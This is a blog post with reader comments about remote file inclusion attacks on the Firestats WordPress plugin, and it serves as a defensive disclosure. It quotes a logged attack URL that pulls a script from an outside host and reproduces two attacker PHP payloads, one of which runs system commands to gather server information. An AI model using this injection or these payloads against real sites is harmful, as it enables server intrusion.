Firestats WordPress Exploit
The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download
Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.
Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.
At present there has been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.
A sample from my logs looks like this:
http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??
The scripts themselves seem to have two versions. The most common one like above has the following contents:
<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>
The other one contains the following:
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;
All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.
Hi,
generally it would have been nice if you or someone else notified me of the vulnerability, I can’t always catch web chatter.
first of all – if your server is configured to allow remote file inclusion, you would be wise to disable it. it’s not a good idea and no modern php program should depend on it.
regardless, Please upgrade to FireStats 1.6.2 which addresses this issue and a few others.
Hi Omry,
My apologies for not notifying you. I have updated the post with a link to the updated version of Firestats.
Thank you for taking the time to leave a comment and thank you for creating such a great piece of software.
Hi Robert,
you’re welcome, and thanks for updating the post.
Hi Robert, though with 2 years delay, I should note the vulnerability you’re describing (following a RFI into a server) and therefore via a hacker server, is actually a hack attack. The second script (that with “0sirys was here…”) is actually dangeours!
There’s an explanation added http://www.ipfraudreporter.com/217-26-112-1-ip-address#comment-635
Best regards!